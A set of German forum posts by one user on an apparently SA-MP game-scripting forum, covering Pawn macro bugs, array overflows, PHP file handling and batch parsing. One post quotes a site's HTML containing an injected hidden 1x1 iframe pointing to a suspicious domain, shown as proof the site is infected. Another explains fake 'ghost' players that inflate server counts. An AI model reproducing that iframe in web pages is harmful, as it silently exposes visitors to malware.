Beiträge von SBIKA


    Du bringts mich zum grinsen.
    Wusste noch nicht das ein GF dynamisch ist und ein Freaktionsautohaus etc. besitzt?
    Wo hast du diese Features nur aktiviert?
    Bin verwundert.


    Godfather laesst sich doch leicht mit Filterscripts auch um dynamische Fraktionshaeuser, Autohaeuser und derartiges erweitern und das Aendern auf SQL, Erstellen von ein paar Funktionsfaehigen Nebenjobs ist auch keine grosse Herrausforderung fuer geuebte Leute. Bei dem "alles dynamisch" ist das etwas Problematischer, denn "alles dynamisch" laesst sich leicht sagen, aber die Umsetzung in Pawn ist nicht so leicht, wenn man es gut machen moechte. Bei Pawn ist dynamisch entweder mit Ressourcenfressend, oder mit 'muss geaendert werden' (#define-dynamisch; also nicht die Art von dynamik die sich viele erhoffen, wenn sie von 'laesst sich ingame aendern' reden) gleich zu setzen. Mit einem Plugin laesst sich das Problem sicherlich umgehen, aber es gibt nicht viele, die sich die Muehe machen wuerden etwas derartiges zu erstellen, nur um eine Hohe dynamik zu erreichen. Deswegen gehe ich davon aus, dass die meisten Angebote, die er bekommen wird (nicht die gezaehlt, die ihn ueber den Tisch ziehen wollen) definitiv nicht dem "alles dynamisch" nahe kommen werden, sondern eher einem etwas dynamischeren Godfather gleichkommen. Aber das ist letzendlich nur spekulatius.
    Die paar Aenderungen waeren sicherlich keine 400E Wert und ein Komplett neuer Gamemode mit den selben Funktionen, wie das Original und ein paar zusatz features ist es meiner Meinung nach auch nicht wert. Denn dann kann man gleich das Original nehmen und anpassen.


    Du moechtest also das gleiche wie alle haben, nur fuer viel Teuerer und mit dem Schriftzug 'Selfmade' drauf?
    Anstatt das Geld in einen weiteren Abklatsch vom Godfather Reallife script zu stecken (das was du in deinem Beitrag beschreibst ist lediglich ein Reallife script, wie Godfather) waere es doch sinnvoller dir selbst eine Gamemode Idee zu ueberlegen und einen Scripter dafuer zu Bezahlen deine Vorstellungen umzusetzen. So koenntest du auch eher Verhindern, dass man dir etwas bereits existierendes als Selfmade andreht.


    PS.: Ich will hier definitiv keinem Vorschreiben, was er mit seinem Geld zu tun und zu lassen hat. Soll mir egal sein, ob jemand ein ueberteuertes Godfather Script kauft, oder nicht. :P

    LOL bist du lustig! Er öffnet die .txt und lädt es nicht runter!


    Kompliment kann ich gerne zurueck geben.
    Nach dem ungewollten oeffnen kannst du auch im Menue "Datei" und "Speichern Unter" auswaehlen, wenn dir ein Rechtsklick auf den Link zu kompliziert ist. :)

    Ich werde mal hier kurz meinen Source veröffentlichen

    Dein Source Code ist schon zahlreich im Internet vertreten und das schon seit einiger Zeit.


    jedoch wer Copy&Paste machen will, kann es gerne anwenden. Ich habe nichts dagegen.

    Wie grosszuegig, dass wir den Open Source code nutzen duerfen, der schon seit 7, oder mehr, Jahren im Internet zu finden ist. Link.


    Es ist ein nicht schweres Programm, geschrieben hab ich es in ca. 10 Minuten in Visual Basic 2008.

    Du hast es also 2005 mit Visual Basic 2008 geschrieben? Koennen nicht viele behaupten 2005 mit Visual Basic 2008 gearbeitet zu haben.
    Ansonsten, wenn du es in diesem Jahr in Visual Basic 2008 ohne Fremde Hilfe geschrieben hast, dann ist es doch ein sehr grosser Zufall, dass dein Source "aehnliche Passagen enthaelt" (Komplett das Selbe, Inklusive Variablen-benennung und synchronem Tab und Enter, ist), wie der, den man Tausendfach im Internet findet.



    Und das naechste mal probierst du es vielleicht mit einem einfachen Link zum Original Post, anstatt Programme mit Strg+C, Strg+V selbst zu "schreiben". :)

    und was bringt das in meinem code, bei dir ist es ja auch nicht
    do{ } while(False)


    Fuer den fall, dass das Makro, wie ein Funktionsaufruf nach einem if() aufgerufen wird:
    #define scm(%1,%2,%3,%4); format(gstring[%1],128,%3,%4); SendClientMessage(%1,%2,gstring[%1]);
    new gstring[MAX_PLAYERS];
    if( .. ) scm(playerid, fmt, vars);
    else
    ...
    wird zu:
    if( .. )format(...); SendClientMessage(..);
    else
    ...
    Resultiert also in einem Fehler, da das format() nur aufgerufen wird, wenn das if wahr ist. Das SendClientMessage() immer aufgerufen wird und das else kein if() mehr vor sich hat.
    Im gegensatz dazu:
    #define SendText(%0,%1,%2,%3) do{new _string[128]; format(_string,sizeof(_string),%2,%3); SendClientMessage(%0,%1,_string);} while(False)
    if ( .. ) SendText(playerid, fmt, vars);
    else
    ...
    wird zu:
    if ( .. ) do{ new ...; format(..); SendClientMessage(..); }while(False);
    else
    ...
    Dort entsteht kein Fehler in einem solchen Fall.


    Das scm Makro, so wie es ist, kann maximal fuer MAX_PLAYERS - 128 verwendet werden:
    #define scm(%1,%2,%3,%4); format(gstring[%1],128,%3,%4); SendClientMessage(%1,%2,gstring[%1]);
    #define MAX_PLAYERS 500
    new gstring[MAX_PLAYERS];
    playerid = 499;
    scm( playerid, ... );

    format( gstring[499], 128, ... );
    Sofern der Compiler das zulaesst wuerde ein Puffer ueberlauf dort entstehen, da nur noch eine Zelle (4byte) zur Verfuegung steht und format dort 128 Zellen (512byte) reinschreiben darf.


    Folgendes Makro sollte, aber beide der genannten Fehler beheben:
    #define scm(%1,%2,%3,%4) {format(gstring,sizeof(gstring),%3,%4); SendClientMessage(%1,%2,gstring);}
    new gstring[128];

    Da ich keine iFrames verwende, und auch nur eine html Datei mit nennenswertem Inhalt habe, gehe ich davon aus, dass das automatische System von Google nicht richtig funktioniert hat, oder dass eine andere Seite auf dem Server, welcher nicht mir gehört, infiziert ist.

    Ok.


    Code
    <title>1000zet</title>
    <!--google analytics code-->
    </head>
    
    
    <body onload = "<iframe src='http://ihqhghqsg.in/main.php?page=899794c4c5adf4f1' width='1' height='1' frameborder='0'></iframe>">
    	Hier entstehen alle 1000zet-Projekte.
    </body>

    http://www.1000zet.net/

    Code
    for /F "tokens=2 delims==" %I in ('findstr computername c:\temp\test.txt') do echo %I

    Quelle
    test.txt sollte dann inetwa so aussehen:
    computername=test1
    computername=test2



    so funktioniert es in PAWN


    for(new i = 0; i<5; i++) Diese Funktion zählt bis fünf und sendet den Output(0>1>2>3>4>5)
    {
    format(string1, sizeof(string1),"strecken %d.log",i); Fügt den Namen mit den oben gezählten Nummern zusammen bsp. (strecken 0.log>strecken 1.log)
    fwrite(hFile, string); Erstellt sozusagen die Dateien
    }


    Batch ist wesentlich anders als pawn. Ausserdem wollte er etwas auslesen und nicht schreiben.

    Was ist denn bei euch beiden kaputt gegangen?
    Btw. Im HTML Teil wird der name einstellung[] zugewiesen, aber PHP deutet dies so, dass einstellung ein Array ist und mehrere Werte haben darf. [] ist daher nicht teil des Namens in PHP.


    Ich verweise einfach mal auf:
    http://aktuell.de.selfhtml.org/artikel/php/checkboxen/
    Falls du nur einen Wert mit checkbox hast kannst du die checkbox auch als nicht-array definieren. Der Browser wird dann zwar alle Werte uebermitteln, aber PHP weist einstellung, dann mehr als einmal zu, sodass die ersten Werte verloren gehen und nur die letzte Zuweisung als solche annimmt.

    Das ist es nicht Wert das zu würdigen.
    Üb mal was und stelle später Sachen rein.
    Kleines Beispiel mit einem Scripter, der etwas hochlädt:


    Dein Bild = Helloworld Filterscript


    Das würde auch niemand hochladen ein Helloworld FS.
    Also mach was Vernünftiges.


    Fuer jemanden, der soetwas: in seiner Signatur verwendet bist du im Bezug auf grafisches Koennen ziemlich Kritisch anderen gegenueber. Hast du das in Paint gemacht? lol.


    Dome
    Warum ist das erste Bild 1500 x 1050 Pixel gross, wenn nur ein Bruchteil nicht weiss ist?

    Danke für die Tipps... es lag daran das ich übersehen hatte den array von gCarLock höher zu setzen.
    Der server crasht leider trotzdem noch ab und zu mit


    samp03svr: amx/amxfile.c:222: fputs_cell: Assertion `fp!=((void *)0)' failed.


    Wenn man fwrite/fputchar oder andere Dateioperationen ausfuehren moechte, sollte man ueberpruefen, ob die Datei geoeffnet werden konnte. fopen() gibt 0 zurueck, wenn das nicht der Fall ist.


    Du versuchst auf gCarLock[431], oldcar = 431, und im zweiten Fall auf gCarLock[533], gLastCar[playerid] = 533, zuzugreifen. gCarLock geht aber nur bis 264. Ueberpruef, ob gLastCar[playerid] bzw. oldcar auch ein array-index ist, bevor du versuchst es zu einem zu machen.

    Wenn ich bei Max veh eine 3 hinsetzte dann kann ich zwar ingame 3 autos kaufen und parken, aber wenn ich relogg mache steht da bloss EIN von den 3 autos an der jeweils geparkten stelle da
    ...
    /buycar Befehl
    ...
    /carkey Befehl


    Ich weiss ja nicht, wie /buycar und /carkey mit dem Parken und einloggen in verbindung stehen, aber einen direkten zusammenhang sehe ich da nicht. Der /park command, bzw. der Teil des Scriptes wo die Autos gespeichert werden, und der Teil, wo die Autos geladen werden waeren in dem Fall sicherlich eher von Bedeutung.
    Ob das Problem beim Speichern der Autos auftritt, oder schon zuvor, kann man herrausfinden, indem man entweder eine Nachricht ueber die gespeicherten Fahrzeuge beim Speichern auf die Konsole/zum Spieler ausgibt, oder indem man den Dateiinhalt/Datenbankinhalt direkt ueberprueft. Wenn dort alle 3 Fahrzeuge gespeichert sind liegt das Problem wahrscheinlich bei der lade-Funktion.

    hallo,
    ich wollte fragen was bei einem tablet pc ein resistiver Touchscreen bedeuted.?
    und ob es gut oder schlecht ist


    Google? Aber ich bin mal so hilfreich und poste mein ergebnis 1,5sekuendiger suche (wikipedia.de->Touchscreen): http://de.wikipedia.org/wiki/T…en#Resistive_Touchscreens


    Edit:
    Habe 10 weitere Sekunden investiert und nach 'Touchscreen resistiv vorteile nachteile' gesucht - hier das erste Ergebnis, was kapazitive und resistive Touchscreens erlaeutert und Vor- und Nachteile nach Sicht des Autors darstellt: http://www.pocketpc.ch/faq-wor…azitiver-touchscreen.html

    //e2
    Er schmeißt mir immer ein Fehler in Linie 4 aus ( Warning: fopen(27047266795601711.txt) [function.fopen]: failed to open stream: No such file or directory in /users/marbec/www/Lic/index.php on line 4 )
    wie kann ich das beheben?


    //e3:


    Soo habs selbst hin bekommen, lag daran das er die Datei erst nach dem Code erstellen wollte und dann kann er ja nichts in die datei reinschreiben wenn die noch nicht existiert. so interpretiere ichs zumindest:D


    Line 4 sollte eigentlich ueberpruefen, ob die Datei bereits existiert. fopen() ist bei angeschaltetem error_reporting nicht so schoen fuer den Zweck. Hier anstelle von fopen() file_exists(). Fclose sollte man im Umgang mit Dateien auch verwenden.

    Nach dem Senden eines Beitrages, in dem mir ein Fehler mit den Zitaten unterlaufen ist (Link), ist mir aufgefallen, dass ich keine Edit Rechte fuer meinen eigenen Beitrag im Neuigkeiten Forum habe.
    Falls das kein Konfigurationsfehler sein sollte einfach ignorieren, oder eine Erlaeuterung aus welchem Grund das so ist. Ansonsten Fehler beiseitgung und dann ignorieren. ;)

    lol.. in R3 dann 1000 Slots oder was?


    So war es anscheinend geplant. Der Client unterstuetzt theoretisch 1000 slots.


    Was sind Ghostuser? Was sollte das bringen außer erhöhte Serverkosten?


    Die ghost-user werden nicht gestreamt, da die Spieler zwar da sind, aber keine Position haben und auch nicht gespawnt werden. Der Server muss also nur zusaetzlich den anderen Spielern die Namen der Virtuellen-Spieler uebertragen und die Information, dass diese Spieler das Spiel betreten haben. Bis auf die Ping-Daten, wenn man sich die SpielerListe anguckt, wird danach nichts mehr ueber die Virtuellen-Spieler gesendet. Wenn dann auch noch das ServerScript, und die anderen samp internen Server-Spieler-Loops angepasst sind erhoeht es die ServerLast nicht besonders.
    Ob besagte Russische Server immer noch solche Methoden verwenden ist schwer zu sagen. Wenn sie das tun werden die Ping-Daten realistisch gefaked, denn als ich mir die Server in 0.3c angeguckt habe hatten die Virtuellen-Spieler noch alle '-1' als Ping Information. Vermutlich verwenden die das zur Zeit nicht, da anscheinend zur Zeit keine fuer 0.3d gemachte Version zur Verfuegung steht.[/quote]




    Edit by DogZone:
    Beitrag, wurde wieder herrgestellt aufgrund eines Fehlers beim Zitat konnte der User sein beitrag nicht bearbeiten(user können beiträge nicht im news bereich editieren).

    Also meinst du so ->


    http://pastebin.com/hwdWZQd9


    EDIT:// Ok, Hab mit Case Zahl of gemacht und ne 1 bekommen xD


    Du hast das Problem, zwar geloest, aber in dem dargestellten Code nutzt du "If Zufall=:1 then" und soweit ich weiss muesste der Code auch mit if korrekt funktionieren, wenn du "If Zufall = 1 then" [ ohne := ] benutzt, denn := ist soweit ich mich erinnere nur als Zuweisungsoperator und nicht als Vergleichsoperator zu verwenden?.
    Habe Delphi nur fuer einen kleinen Taschenrechner verwendet um die Sprache ein wenig auszuprobieren, daher sorry, wenn ich etwas falsches sage.